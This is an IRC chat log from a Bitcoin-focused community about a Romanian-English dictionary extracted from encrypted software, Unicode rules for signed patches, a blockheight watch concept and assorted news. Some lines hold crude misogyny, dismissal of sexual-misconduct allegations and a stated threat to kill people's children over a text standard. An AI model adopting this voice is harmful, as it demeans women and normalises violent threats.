1740549;1511045944;asciilifeform;lol all wp pingback ddosolade ? 1740550;1511045947;asciilifeform;or not all 1740551;1511046022;mircea_popescu;superficially seems like all sorts ; kinda not have the time now to feed a quarter gb log through summarizer. 1740552;1511046172;mircea_popescu;anyway, over 1TB burned, month half way. blog infrastructure liek bitcoin infrastructure in more ways than one. 1740553;1511048274;deedbot;http://www.contravex.com/2017/11/18/specs-and-designs-for-the-first-ever-blockheight-timepieces/ << Contravex: A blog by Pete Dushenski - Specs and designs for the first ever Blockheight Timepieces. 1740554;1511048275;pete_dushenski;pete_dushenski: here now 1740555;1511048284;pete_dushenski;mircea_popescu: ^ 1740556;1511048296;mircea_popescu;in other grandeurs, this place is a bona fida meteorological observatory. i sat over pasta and watched a complete cloud system move across the sky. here the sky's blue, here's the coming cloud front, there's rain... 1740557;1511048786;pete_dushenski;sounds a lot like teh prairies except in cr you can't see spot running away for weeks 1740558;1511048945;asciilifeform;Radio Wave at 40 kHz, 60kHz, 68.5 kHz, and 77.5kHzv – GPS signal at 1575.42 MHzvi – LTE with eSIM at 2600 MHzvii << bahahahahwat ntp thread alloveragain ?! 1740559;1511048966;asciilifeform;and kanzure's bch satellite. 1740560;1511049093;pete_dushenski;asciilifeform: how'd you approach the problem of frequently updated blockheight on the wrist ? well, "problem"... 1740561;1511049131;pete_dushenski;it's gedankenexperiment 1740562;1511049144;asciilifeform;shortwave. from festung mircea_popescustein's 500kW transmitter. 1740563;1511049167;asciilifeform;wearer's body as antenna. 1740564;1511049193;pete_dushenski;so wouldn't update if owner took off to, say, take a shower ? 1740565;1511049199;asciilifeform;nope 1740566;1511049206;asciilifeform;why wouldja care what it does when yer not wearing it 1740567;1511049209;asciilifeform;it's a clock. 1740568;1511049229;asciilifeform;connect to stationary antenna if you must have it show output on yer desk. 1740569;1511049248;pete_dushenski;aha 1740570;1511049260;pete_dushenski;ya, i was thinking of desk scenario 1740571;1511049283;pete_dushenski;stationary antenna worx 1740572;1511049351;mod6;<+mircea_popescu> nice work mod6 << Thx, cheers! 1740573;1511049562;pete_dushenski;in other technical considerations, "this is not a pig" http://frgdr.com/wp-content/uploads/2009/02/jerusalem-biblical-zoo_peccary-sign_yiddish.jpg 1740574;1511049679;*;pete_dushenski had bacon-wrapped figs at girl's office xmas party last night (it was -20C so felt plenty xmassy). delicious with italian red wine. 1740575;1511050359;pete_dushenski;http://btcbase.org/log/2017-11-13#1737162 << very neato. 1740576;1511050359;a111;Logged on 2017-11-13 05:49 ag3nt_zer0: Never been in a place that has equaled that in regards to my definition of a warm home... looking forward to learning more of Ingels 1740577;1511050638;pete_dushenski;http://btcbase.org/log/2017-11-14#1737340 << tesla isn't going anywhere. has now released "semi-truck" and "roadster 2.0" with which to continue the endless dangle of consumer tech disruption, always 3 years into the future. elon is the master of no bread today but e-cake tmrw. 1740578;1511050638;a111;Logged on 2017-11-14 00:55 mircea_popescu: http://btcbase.org/log/2017-11-13#1737193 << in no sense more terminal than say apple. 1740579;1511051297;shinohai;Nifty sketches there pete_dushenski 1740580;1511052036;pete_dushenski;shinohai: heh they're really not much 1740581;1511052222;shinohai;Well certainly better than *some* things I have seen. I at least didn't go "wtf am I looking at?" lol 1740582;1511052556;pete_dushenski;lol art school was almost 20 years ago now, but i guess not never 1740583;1511056658;asciilifeform;meanwhile, on asciilifeform's vivisection table : http://btcbase.org/log/2017-11-17#1740234 >>> becomes >>> http://www.loper-os.org/pub/ro_eng_ascii.txt 1740584;1511056658;a111;Logged on 2017-11-17 23:07 asciilifeform: http://www.free-soft.ro/everest/everest.html has nominally ~200k but is malwareware and enciphered db ( i dun currently have time to break the delphiturd and extract the key, sadly ) 1740585;1511056669;asciilifeform;sha512sum == 8d98e23900035eae68632746c9b1fb6c39fecd98c1434bf5e86af9b3d0f26bc56a9c33bf99afc5a3624914dccd0902922eeaf4f34194ea680641a4c9ff80d74e 1740586;1511056678;asciilifeform;133333337 w4r3z!!! 1740587;1511056723;asciilifeform;caveat : it's a spoil of war, i cannot guarantee the contents, could have some qty of any degree of nonsense in there. 1740588;1511056841;asciilifeform;caveat x2 : no îțâșă . but it was missing in the original, i did not remove it. ascii-only, in the derp's original, e.g. 'uşă' turns into 'usa'. 1740589;1511056869;asciilifeform;( n00bz -- see also http://btcbase.org/log/2017-10-24#1728148 ) 1740590;1511056869;a111;Logged on 2017-10-24 18:25 mircea_popescu: say îțâșă lol 1740591;1511057086;asciilifeform;ben_vulpes pete_dushenski & other potential rotakus ^ 1740592;1511057138;shinohai;neat asciilifeform greatly appreciated. 1740593;1511057185;asciilifeform;it would be rather difficult for it to be worse than google's idiocy 1740594;1511057193;asciilifeform;though admittedly possible. 1740595;1511057206;asciilifeform;and you can use it offline, with grep. which is why i even wanted one. 1740596;1511057327;asciilifeform;mircea_popescu is prolly looking for a bucket large enuff to properly barf into, at this point, lol 1740597;1511057486;asciilifeform;i deduplicated it and reversed ( sorted by ro ) before posting , 148469 lines . but some of the 'words' can be only with difficulty called words. 1740598;1511057508;asciilifeform;e.g. ' ciclu format din atomi de carbon`carboatomic ring ' and the like. 1740599;1511057554;asciilifeform;address all complaints to the original idjit, who stole it from fuck-knows-where and felt compelled to crypt it and obfuscate his winturd so that presumably others could not easily find what he ripped off 1740600;1511057686;asciilifeform;afaik this item is the only plaintext ro/eng dict on the entire net currently... 1740601;1511057703;*;asciilifeform bbl,meat. 1740602;1511061284;mircea_popescu;!~ticker --market all 1740603;1511061291;jhvh1;mircea_popescu: Bitstamp BTCUSD last: 7809.89, vol: 5947.42955655 | Bitfinex BTCUSD last: 7820.0, vol: 31131.60224221 | Kraken BTCUSD last: 7794.9, vol: 2202.70778376 | Volume-weighted last average: 7817.06182874 1740604;1511061314;mircea_popescu;!!pay pete_dushenski 1 1740605;1511061317;deedbot;Get your OTP: http://p.bvulpes.com/pastes/bmggA/?raw=true 1740606;1511061732;mircea_popescu;http://btcbase.org/log/2017-11-19#1740583 << from a cursory review this is an old dex (the substance of the originally quoted dexonline item ; 1970s ro dictionary) coupled with an altogether dubious, but broadly workable translatatron. not useless. 1740607;1511061732;a111;Logged on 2017-11-19 01:57 asciilifeform: meanwhile, on asciilifeform's vivisection table : http://btcbase.org/log/2017-11-17#1740234 >>> becomes >>> http://www.loper-os.org/pub/ro_eng_ascii.txt 1740608;1511061734;scriba;TypeError: argument of type 'NoneType' is not iterable (file "modules/archive.py", line 59, in archive_a_url) 1740609;1511061943;mircea_popescu;clica evidently clique not clan ; clichet evidently clicket, it is after all a cc etc. 1740610;1511062456;mircea_popescu;îțâșă << it's apparently disappeared from the internets altogether. ima dig up teh originating site one of these days. 1740611;1511062554;mircea_popescu;http://btcbase.org/log/2017-11-19#1740595 << this, very muchly. most of the problem of "but mp, i have no way to search BY DEFINITION!!1" is compensated by escaping from the idiocy of book. yes there is way to search by definition, that's what log search is even used for 90% of the time! 1740612;1511062554;a111;Logged on 2017-11-19 02:06 asciilifeform: and you can use it offline, with grep. which is why i even wanted one. 1740613;1511062617;mircea_popescu;http://btcbase.org/log/2017-11-19#1740596 << nah. the principal sad of that item is that it excludes the phonetic transcription -- which'd allow it to also function as eg rhyming dict. this is a mixed blessing -- the original it evidently copies did include it ; BUT it wasn't written in proper ipa. 1740614;1511062617;a111;Logged on 2017-11-19 02:08 asciilifeform: mircea_popescu is prolly looking for a bucket large enuff to properly barf into, at this point, lol 1740615;1511062626;mircea_popescu;because romanians are idiots, and especially romanian linguists. 1740616;1511062717;mircea_popescu;http://btcbase.org/log/2017-11-19#1740599 << this'd be 99% of the windows-space "software development", starting with bill gates' original "work". as you say above, "foss'd have been hard pressed to be worse than alternative" 1740617;1511062717;a111;Logged on 2017-11-19 02:12 asciilifeform: address all complaints to the original idjit, who stole it from fuck-knows-where and felt compelled to crypt it and obfuscate his winturd so that presumably others could not easily find what he ripped off 1740618;1511063900;BingoBoingo; graduate student just as 100% idle hopeless underproducing hyperconsumer with or without rule. << Only not completely hopeless if graduated in 2012 and found proto-republic in 2013, to be evaled after arriving in Montevideo 1740619;1511063931;mircea_popescu;i prefer to think of you as an ex-drunk than as an ex-gradstud 1740620;1511063972;BingoBoingo; mircea_popescu: it's 'staggering amount' to the derp who is in the 0% tax bracket today but would theoretically live in the 40% if the discount were to be counted ( as it by all rights oughta ) as income << Not a staggering amount because jello shots are three for a dollar and after 30 of them sure staggering, what are numbers? 1740621;1511064116;BingoBoingo; http://btcbase.org/log/2017-11-18#1740244 << amusingly, the evident "constant upgrades philosophy stranded ycombinator" angle unvoiced. << Naturally 1740622;1511064116;a111;Logged on 2017-11-18 00:06 BingoBoingo: In still coaster lollers: "Thiel's departure from Y Combinator was not previously announced. It comes long after Y Combinator president Sam Altman defended Thiel's role at the accelerator, following criticism of Thiel's support of then-presidential candidate Donald Trump. A source close to Y Combinator said that the company ended its part-time partners program, which Thiel was a part of, some time last year. While some other part-time 1740623;1511064317;BingoBoingo;mircea_popescu: I dunno if there's much difference, but if I was not drunk to be ex-drunk the grad student retardation may have been stickier 1740624;1511064354;BingoBoingo;Cheap Vodka: Vessel of salvation AND harbringer of impending doom! 1740625;1511064365;mircea_popescu;quite exactly. "i dunno if there's any difference, but if i weren't slutty enough to be a whore my marriage may have not ended". doh. 1740626;1511064374;BingoBoingo;lol 1740627;1511064671;asciilifeform;http://btcbase.org/log/2017-11-19#1740613 << if sumbody posts a ro-to-en ( or i'd much prefer a ru, say ) dict that is less radiationdamaged -- i'll use that , and throw the current one out. until then -- it's ~the~ dict. 1740628;1511064671;a111;Logged on 2017-11-19 03:36 mircea_popescu: http://btcbase.org/log/2017-11-19#1740596 << nah. the principal sad of that item is that it excludes the phonetic transcription -- which'd allow it to also function as eg rhyming dict. this is a mixed blessing -- the original it evidently copies did include it ; BUT it wasn't written in proper ipa. 1740629;1511064759;*;asciilifeform doesn't plan to spend a long time needing one , but currently will admit to it 1740630;1511068763;lobbes;http://btcbase.org/log/2017-11-18#1740385 << thing is, if I wget the archive.is page with the -pk option on, I get turd-soup in many cases. For example, "wget -pk --user-agent="" -e robots=off --wait 1 http://archive.is/MiJ5U" yields a handful of .pngs and nothing else. Versus just wget-ing the actual trilema item with the same options yields a perfectly usable local copy 1740631;1511068763;a111;Logged on 2017-11-18 21:06 mircea_popescu: http://btcbase.org/log/2017-11-17#1740240 << use wget-of-archive-page and zip that! 1740632;1511068769;lobbes;And to boot, it seems that pointing wget at archive.is pages still doesn't capture the 'dynamic' content alf alluded to, such as the inline images found in archives of noose-sites like http://archive.is/dIlCm 1740633;1511068784;lobbes;Currently going down the headless-browser path ben_vulpes suggested. Looking into phantomjs atm, which seems like it could do the job. I have an old craptop I'm thinking of using as the proverbial 'public toilet' to house it on. (This is the same craptop I was planning to put a trb node on. I put a spanking-new ssd in there but then realized that the ethernet dun work anymore; wifi only. May be a good use for the thing to just be a turd server in 1740634;1511068785;lobbes;stead) 1740635;1511070870;ben_vulpes;in other plagiaristic urls and magic profitz: https://www.btcbase.io/ 1740636;1511070975;ben_vulpes;http://btcbase.org/log/2017-11-11#1736314 << done; chinesium multimeter showed itself to be completely broken, so repurposing svideo cable will have to wait. stuck on plasticrap for now... 1740637;1511070975;a111;Logged on 2017-11-11 21:44 asciilifeform: as for capslock, there is a mod, you can remove the lock latch 1740638;1511072351;BingoBoingo;!~bcstats 1740639;1511072352;jhvh1;BingoBoingo: Current Blocks: 495044 | Current Difficulty: 1.364422081125E12 | Next Difficulty At Block: 495935 | Next Difficulty In: 891 blocks | Next Difficulty In About: 5 days, 15 hours, 29 minutes, and 18 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1740640;1511072358;BingoBoingo;!~ticker --market all 1740641;1511072366;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7770.98, vol: 5391.18146065 | Bitfinex BTCUSD last: 7757.4, vol: 27569.19569432 | Kraken BTCUSD last: 7750.0, vol: 1930.15436482 | Volume-weighted last average: 7759.08897117 1740642;1511072399;BingoBoingo;What an incredibly stablitit time to have converted 1 BTC to roll form 1740643;1511072723;BingoBoingo;And in other news poor Mugabe 1740644;1511078078;BingoBoingo;And the pantsuit purge expands: "John Draper, a legendary figure in the world of pre-digital phone hacking known as "phreaking," has been publicly accused of inappropriate sexual behavior going back nearly two decades." 1740645;1511079395;lobbes;Amusing part about this purge is how quickly some of these d00ds submit to the insanity for hopes that they can continue to trade more stones for stone-soup: http://archive.is/WbvN2#selection-2307.24-2307.762 1740646;1511085740;mircea_popescu;http://btcbase.org/log/2017-11-19#1740635 << such professional. 1740647;1511085740;a111;Logged on 2017-11-19 05:54 ben_vulpes: in other plagiaristic urls and magic profitz: https://www.btcbase.io/ 1740648;1511085851;mircea_popescu;http://btcbase.org/log/2017-11-19#1740645 << it's even funnier when you consider how deeply anachronistic it is. "we've decided TODAY shit that was acceptable yesterday shouldn't have been, so we're going to talk importantly about the people who did the acceptable thing of yesterday yesterday and how bad they are". dude... at least they DID SOMETHING. much unlike the schmucks derping about it today. 1740649;1511085851;a111;Logged on 2017-11-19 08:16 lobbes: Amusing part about this purge is how quickly some of these d00ds submit to the insanity for hopes that they can continue to trade more stones for stone-soup: http://archive.is/WbvN2#selection-2307.24-2307.762 1740650;1511085887;mircea_popescu;when's the last time someone who HASNT engaged in "inappropriate sexual behaviour" twenty years ago actually got laid ? that's what i wanna know. 1740651;1511085953;mircea_popescu;no, sitting around derping about "the future, man" with a buncha self-professed "lesbians" (cuz its easier than admitting you're too lazy to put out) dun cunt. i mean count. 1740652;1511091828;mircea_popescu;in other rotaku interest items : https://thraxusares.wordpress.com/2016/05/30/etimologii-rusinoase-pizda/ (proposing the perhaps persuasive theory whereby ro pizda is not slav borrowing but common substrate, extremely extensive documentation. lots of other items of interest in luxuriant detail.) 1740653;1511091864;mircea_popescu;and speaking of which, re http://btcbase.org/log/2017-11-19#1740583 : do me a favor and genesis it, ima fix/update as the time permits, how about that. 1740654;1511091864;a111;Logged on 2017-11-19 01:57 asciilifeform: meanwhile, on asciilifeform's vivisection table : http://btcbase.org/log/2017-11-17#1740234 >>> becomes >>> http://www.loper-os.org/pub/ro_eng_ascii.txt 1740655;1511099603;shinohai;Morning republicans! 1740656;1511099732;mircea_popescu;aaand in other holy shits : https://www.okcupid.com/about 1740657;1511099747;mircea_popescu;scroll down to where it says CTO : mike_c 1740658;1511099812;shinohai;O.o 1740659;1511100023;mircea_popescu;(apparently okcupid went full app-shit sometime in the interval also ?) 1740660;1511102551;asciilifeform;http://btcbase.org/log/2017-11-19#1740653 >> neato! >>> http://www.loper-os.org/pub/ro_eng_genesis.vpatch + http://www.loper-os.org/pub/ro_eng_genesis.vpatch.asciilifeform.sig . 1740661;1511102551;a111;Logged on 2017-11-19 11:44 mircea_popescu: and speaking of which, re http://btcbase.org/log/2017-11-19#1740583 : do me a favor and genesis it, ima fix/update as the time permits, how about that. 1740662;1511102704;asciilifeform;http://btcbase.org/log/2017-11-19#1740652 << pretty lulzy... salamandră . stație experimentală . Țarigrad . Țările de Jos . triunghiul Bermudelor ! 1740663;1511102704;a111;Logged on 2017-11-19 11:43 mircea_popescu: in other rotaku interest items : https://thraxusares.wordpress.com/2016/05/30/etimologii-rusinoase-pizda/ (proposing the perhaps persuasive theory whereby ro pizda is not slav borrowing but common substrate, extremely extensive documentation. lots of other items of interest in luxuriant detail.) 1740664;1511102723;asciilifeform;capcană ahahahahaha 1740665;1511102760;asciilifeform;http://btcbase.org/log/2017-11-19#1740657 << this is actually pretty sad. 1740666;1511102760;a111;Logged on 2017-11-19 13:55 mircea_popescu: scroll down to where it says CTO : mike_c 1740667;1511103089;BingoBoingo; (apparently okcupid went full app-shit sometime in the interval also ?) << The website has increasingly little to hook, and is increasingly poorly populated. Last week Uruguay had 4 girls, now has 2. Extrapolating from Uruguay's 4 million population this means ~35000 girls is all okc has left. Been in decline for a while, but now fallen sharply. 1740668;1511103102;BingoBoingo;Even less alternatives to talking to people now. 1740669;1511103145;asciilifeform;( phunphakt -- in addition to http://btcbase.org/log/2016-12-03#1577428 history -- okc at one time ran surveys , and rediscovered the known-to-the-ancients 'EVERYONE, no exceptions, likes lighter skin' item. and then immediately doctored the site and fell into politruk line, no moar 'risky' surveys. ) 1740670;1511103145;a111;Logged on 2016-12-03 23:35 mircea_popescu: 2nd generation immigrant, sold edonkey to barnes&noble, sold okcupid to iac, will sell his highschool sweetheart if it comes to that or no more starbucks. 1740671;1511103214;BingoBoingo;Well, survey thing was slashed during IAC acquisition era 1740672;1511103574;asciilifeform;http://btcbase.org/log/2017-11-19#1740635 << brought to us, no doubt, by the same fine folx who brought us http://btcbase.org/log/2017-05-18#1658672 and http://btcbase.org/log/2017-01-31#1610071 1740673;1511103574;a111;Logged on 2017-11-19 05:54 ben_vulpes: in other plagiaristic urls and magic profitz: https://www.btcbase.io/ 1740674;1511103574;a111;Logged on 2017-05-18 20:25 jurov: wtf http://mpex.co/history_of_bitcoin_stock_exchanges.html 1740675;1511103574;a111;Logged on 2017-01-31 02:25 asciilifeform: http://cardano.io 1740676;1511103629;asciilifeform;there were a few others in same spirit, but i've misplaced'em 1740677;1511103793;asciilifeform;!~later tell ben_vulpes http://btcbase.org/log/2017-11-19#1740636 << they're exactly the same cable , you dun need a multimeter 1740678;1511103793;a111;Logged on 2017-11-19 05:56 ben_vulpes: http://btcbase.org/log/2017-11-11#1736314 << done; chinesium multimeter showed itself to be completely broken, so repurposing svideo cable will have to wait. stuck on plasticrap for now... 1740679;1511103793;jhvh1;asciilifeform: The operation succeeded. 1740680;1511103838;asciilifeform;http://btcbase.org/log/2017-11-19#1740633 << 80211 suxx for anything resembling a server, it drops out 1740681;1511103838;a111;Logged on 2017-11-19 05:19 lobbes: Currently going down the headless-browser path ben_vulpes suggested. Looking into phantomjs atm, which seems like it could do the job. I have an old craptop I'm thinking of using as the proverbial 'public toilet' to house it on. (This is the same craptop I was planning to put a trb node on. I put a spanking-new ssd in there but then realized that the ethernet dun work anymore; wifi only. May be a good use for the thing to just be a turd server in 1740682;1511103944;asciilifeform;http://btcbase.org/log/2017-11-19#1740644 >> https://archive.is/0nz9U << 'In a series of tweets, Matt Blaze, now a well-known cryptography professor at the University of Pennsylvania, said on Twitter that Draper took an interest in him as a teenager, and invited him to share in his "exercises."' 1740683;1511103944;a111;Logged on 2017-11-19 07:54 BingoBoingo: And the pantsuit purge expands: "John Draper, a legendary figure in the world of pre-digital phone hacking known as "phreaking," has been publicly accused of inappropriate sexual behavior going back nearly two decades." 1740684;1511103968;asciilifeform;!#s matt blaze 1740685;1511103968;a111;6 results for "matt blaze", http://btcbase.org/log-search?q=matt%20blaze 1740686;1511103971;asciilifeform;http://btcbase.org/log/2016-08-26#1529864 << ding 1740687;1511103971;a111;Logged on 2016-08-26 15:55 mircea_popescu: Their successors include Matt Blaze, a widely known cryptographer and associate professor at the University of Pennsylvania; Cindy Cohn, Ms. Steele’s successor as executive director at the Electronic Frontier Foundation; Bruce Schneier, a security author and expert; Gabriella Coleman, an anthropologist at McGill University who writes about online activism; Linus Nordberg, a longtime internet and privacy activist; and Megan 1740688;1511103992;asciilifeform;runs... tor. 1740689;1511104057;asciilifeform;( and apparently author of ye olde 'turtle' , http://btcbase.org/log/2016-02-09#1401230 << thread ) 1740690;1511104057;a111;Logged on 2016-02-09 21:12 asciilifeform: interestingly, blaze uses the term 'cryptovariable' in his code 1740691;1511107766;ben_vulpes;asciilifeform: attaching s-video out of aek to microcontroller, which makes a usb 1740692;1511116311;asciilifeform;mircea_popescu: i extracted 4 other ro dicts from the turd : 2 'technical', 1 'expressions', 1 'proverbs' 1740693;1511116324;asciilifeform;some of these, oddly, have orcograms 1740694;1511116674;mircea_popescu;asciilifeform let's start with the first. 1740695;1511116755;mircea_popescu;also, my policy re "diacritics" as they're called is that i don't write them, but i don't actually bother to take em out from text i touch. so there's all sorts of ro literature i fixed on my blog, where it's quite evident what the original author contributed and what i put in, because the rotards are very much into this "currently correct romanian notation is alphabet + 5, down from alphabet + 12 a century ago, and THIS MATT 1740696;1511116755;mircea_popescu;ERS IMMENSELY" nonsense. 1740697;1511116926;mircea_popescu;http://btcbase.org/log/2017-11-19#1740662 << it is as best i can tell a ~complete~ list. which yes, it's how romanian sinonymy works, you get 1k for whore etc. 1740698;1511116926;a111;Logged on 2017-11-19 14:45 asciilifeform: http://btcbase.org/log/2017-11-19#1740652 << pretty lulzy... salamandră . stație experimentală . Țarigrad . Țările de Jos . triunghiul Bermudelor ! 1740699;1511116939;asciilifeform;hmm this was in the l0gz, mircea_popescu asked folx to promise not to vgenesisate uniturds 1740700;1511116953;asciilifeform;can't seem to find where 1740701;1511116964;mircea_popescu;amusingly, the slut/whore (woman that does it with everyone because has an itch in her cunt / woman that does it with everyone because has an itch in her purse) is not preserved. but 1k nevertheless. 1740702;1511116988;mircea_popescu;asciilifeform aw shit, did i just entice you to break form ? 1740703;1511117046;asciilifeform;well not yet 1740704;1511117060;asciilifeform;it's why i haven't genesisated the 15MB of new item yet 1740705;1511117143;mircea_popescu;http://btcbase.org/log/2016-02-25#1415401 interesting re this. 1740706;1511117143;a111;Logged on 2016-02-25 17:12 phf: i've been mulling over that question with logs. fwiw, entire log can be kept in memory for analysis, annotation, whatever, 180mb as utf-8 byte arrays. with unicode strings takes up twice the memory on 16-bit cmucl, and ~~4 times on 32-bit sbcl. i'm not yet convinced that transcoding everything you get into string and then transcoding it back to a bytearray onto the wire is the best strategy 1740707;1511117162;*;mircea_popescu is digging the logs too 1740708;1511117373;mircea_popescu;http://btcbase.org/log-search?q=unicode+from%3Amircea << not in here. 1740709;1511117440;mircea_popescu;ahahaha holy sdhit this thing. 1740710;1511117471;mircea_popescu;"+cardinalitate, posibilitate a unui sistem informatic de a reactiona simultan diferite operatii`cardinalidad" << "cardinality, the possiblity of an informatic system to simultaneously react different operations". 1740711;1511117543;mircea_popescu;this is the level of romanian members of the academy of arts and letters, exactly. http://trilema.com/2010/hai-sa-studiem-gramatica-impreuna/ has teh details. 1740712;1511117626;asciilifeform;mircea_popescu: iirc it was 'utf' 1740713;1511117652;*;mircea_popescu will peruse that list also 1740714;1511117706;mircea_popescu;http://btcbase.org/log/2016-04-05#1446455 1740715;1511117706;a111;Logged on 2016-04-05 22:08 mircea_popescu: OMFG! so these useless imbeciles have added every last thing to utf EXCEPT A TITS GLYPH ? 1740716;1511117707;mircea_popescu;you know ? 1740717;1511117725;mircea_popescu;inclusive except for the only thing that matters. fuckers. 1740718;1511117732;shinohai;kek 1740719;1511117948;mircea_popescu;as per teh logic of the venerable http://trilema.com/2014/namecheap-goes-off-the-deep-end-anyone-know-a-decent-domain-registrar/ : insert ways for me to demean women in your "novel standard" as the first list of must-haves, because the ~possiblity~ of demeaning women is fundamental to any workable communication system. not inserting them isn't going to forward your political agenda ; it's going to simply precipitate a http:// 1740720;1511117948;mircea_popescu;btcbase.org/log/2015-01-30#998185 dissidence, ie i will raise arms and kill not just your standard, but your children along with it. literally. 1740721;1511118018;mircea_popescu;http://btcbase.org/log/2016-09-20#1545815 << fucking unicode, nothing but a means to oppress the only elements of any group that actually matter. 1740722;1511118018;a111;Logged on 2016-09-20 19:48 mircea_popescu: how cool it is that we ate all the bugs and errors from "supporting utf", because look - there's no fucking glyph-based way to latex, in 2016. 1740723;1511118061;asciilifeform;recall the chinese thread 1740724;1511118098;asciilifeform;!#s 妓 1740725;1511118099;a111;3 results for "妓", http://btcbase.org/log-search?q=%E5%A6%93 1740726;1511118111;asciilifeform;http://btcbase.org/log/2017-07-22#1689141 << ding 1740727;1511118111;a111;Logged on 2017-07-22 21:11 asciilifeform: at the cost of a bit of log clutter, let's indulge asciilifeform's crackpottery, and lay out 妓 ( U+5993 : whore ) : 1740728;1511118152;*;mircea_popescu reads 1740729;1511118218;mircea_popescu;asciilifeform amusingly my next line being http://btcbase.org/log/2017-07-22#1689192 way down. i dun ask anyone to promise nething do i ? 1740730;1511118218;a111;Logged on 2017-07-22 21:51 mircea_popescu: so i joined the whores going to the gym. my first time in a gym at that! it was discovered that yes i'm a lot more powerful than they are, but i have neither the flexibility nor the endurance. 1740731;1511118432;mircea_popescu;searching logs (in this case, for "promise") doth yield some fabulous gems. such as http://btcbase.org/log/2017-04-07#1640169 1740732;1511118432;a111;Logged on 2017-04-07 18:25 mircea_popescu: as a general rule, people who can't produce genus/difference definitions for all the symbols in their own output are better off not thinking yet, as what they think thinking is isn't. 1740733;1511118551;asciilifeform;found it : http://btcbase.org/log/2016-11-29#1574497 1740734;1511118551;a111;Logged on 2016-11-29 14:36 mircea_popescu: speaking of above article, can i get a commitment to never signing any V material which includes any non-ascii characters ? BingoBoingo diana_coman hanbot trinque mod6 danielpbarron mircea_popescu mike_c asciilifeform davout ben_vulpes phf jurov 1740735;1511118556;mircea_popescu;asciilifeform http://btcbase.org/log/2016-12-23#1589158 << is this it ? 1740736;1511118556;a111;Logged on 2016-12-23 14:55 mircea_popescu: suppose we had a rule stating that "all patches must include as a comment the patch upon they are to be applied" ? 1740737;1511118572;mircea_popescu;o wow. 1740738;1511118609;mircea_popescu;settled then. 1740739;1511118643;asciilifeform;the hilarious bit : the orcogram in question is a ~short stroke~ 1740740;1511118647;asciilifeform;really oughta be asciifiable 1740741;1511118665;asciilifeform;( it's still missing the îțâșă ) 1740742;1511118793;mircea_popescu;http://btcbase.org/log/2016-11-29#1574510 << phf even has claim to original art. 1740743;1511118793;a111;Logged on 2016-11-29 14:43 phf: we had a thread when diff was first discussed as a way to do patches (i think maybe before even v), where i was erring on the side of no unicode support on the grounds that if we decide to support unicode we have to, to borrow asciilifeforms, drink the whole spittoon 1740744;1511118841;asciilifeform;fwiw i'm not wholly convinced re 'whole spittoon' 1740745;1511118871;mircea_popescu;res judicata, fortunately. 1740746;1511118928;mircea_popescu;in a totally meta-point : can you BELIEVE how INCREHEHEHEEEEDIBLY useful our whole infrastructure actually is ? 1740747;1511118957;mircea_popescu;no court in the history of the legal profession ever managed the pinnacle of legal achievement on display here in this past HALF HOUR omfg. 1740748;1511118991;mircea_popescu;leveraged human thought to a degree not seen before nor, honestly speaking, conceivable without the example./ 1740749;1511119135;shinohai;In mircea_popescu bitcointalk lulz: https://bitcointalk.org/index.php?topic=1935018.0 1740750;1511119140;mircea_popescu;asciilifeform here's a lulz for you : before making the fain@polimedia item discussed in logs recently ( http://btcbase.org/log/2017-10-28#1730110 etc) i actually attempted a... ro dictionary full rewrite. was called "adex". 1740751;1511119140;a111;Logged on 2017-10-28 05:58 mircea_popescu: hanbot you prolly recall, old fain datas, http://trilema.com/2011/2022353/ 1740752;1511119142;shinohai;Apparently I missed that one 1740753;1511119158;mircea_popescu;so now, upon proceeding with this item of yours, i obviously reopened that 7 year old directory. wherein i found... 1740754;1511119174;mircea_popescu;an antique and therefore reliable copy of the dex (dictionar explicativ al limbii romane). 80 mb's worth. 1740755;1511119177;mircea_popescu;i presume you want ? 1740756;1511119179;asciilifeform;aha! 1740757;1511119221;asciilifeform;in other pipeline, the 'proverbs' item is hopelessly bitrotten, i'ma jettison it. the 'tech' and 'expressions' otoh are ready, dedupped, and flipped ( so as ro->eng ) 1740758;1511119228;mircea_popescu;shinohai lel 1740759;1511119231;asciilifeform;and ready for either genesisation or not 1740760;1511119267;mircea_popescu;asciilifeform how many lines the expression item ? (tech i will asume worthl;ess sight unseen -- bot didn't write a ro tech dictionary and ~nobody else was qualified to) 1740761;1511119333;asciilifeform;http://www.loper-os.org/pub/ro_eng_tech.txt http://www.loper-os.org/pub/ro_eng_expr.txt << 313333337 w4r3z 1740762;1511119361;asciilifeform;again, за что купил зато и продаю , no guarantee of wtf is in'ere 1740763;1511119476;asciilifeform;ftr, how to flip one of these : 1740764;1511119513;asciilifeform;paste -d'`' <(cut -f2 -d'`' orig_dict.txt) <(cut -f1 -d'`' orig_dict.txt) | sort -n > flipped_dict.txt 1740765;1511119521;asciilifeform;^^^ worx great ^^^ 1740766;1511119546;mircea_popescu;yep, teh tech bit is entirely not worth anyone's time. 1740767;1511119574;asciilifeform;imho the 1st item was much too full of http://btcbase.org/log/2017-11-19#1740598 as it was 1740768;1511119574;a111;Logged on 2017-11-19 02:11 asciilifeform: e.g. ' ciclu format din atomi de carbon`carboatomic ring ' and the like. 1740769;1511119595;asciilifeform;might even be worth using the tech list as ~subtractand~ 1740770;1511119639;mircea_popescu;"12 este divizibil prin 2`12 is divisible by 2" holy shit. there are some useful expressions in the expression item, however a) very low snr, lots of useless crap and b) idiomatics not really a good fit for dictionary, much better fit in blog articles. 1740771;1511119643;mircea_popescu;consequently ima skip. 1740772;1511119666;asciilifeform;oh btw i cut some truly egregious nonsense from orig item : it had a coupla dozen 'dates of life of great people' 1740773;1511119678;asciilifeform;because apparently when caesar lived totally belongs, according to these folx, in a dictionary. 1740774;1511119908;mircea_popescu;asciilifeform lots of good ones missing. "i-a picat fata" (his face fell off) ; "a dat cu mucii-n fasole" (he snotted the refried beans) ; "iti pica fisa ?" (does the coin inserted into your coinslot actually fall through the spuriously complex machinery inside your otherwise empty skull to make the necessary contacts ?) ; "a freca menta" (mintrubbing, absent ?! gimme a break!) ; "ai morcov [in fund] ?" (to have a carrot [up 1740775;1511119908;mircea_popescu;arse]) and so on and so following 1740776;1511119940;asciilifeform;i suspect it's an ancien-regime work 1740777;1511119945;mircea_popescu;it misses so many of the most trite expressions it's not worth mentioning as a dictionary anyway, much in the way a "map" of texas that only had dallas. 1740778;1511119955;mircea_popescu;asciilifeform all these are pre 1980. 1740779;1511119960;asciilifeform;it shows 1740780;1511119972;mircea_popescu;the snot item is very likely older than the united states for example. 1740781;1511119999;asciilifeform;i meant it was prolly considered 'unprintable' by the '80s prudes 1740782;1511120029;mircea_popescu;but the coin item is VERY specifically related to apparatus that only existed in the 80s. 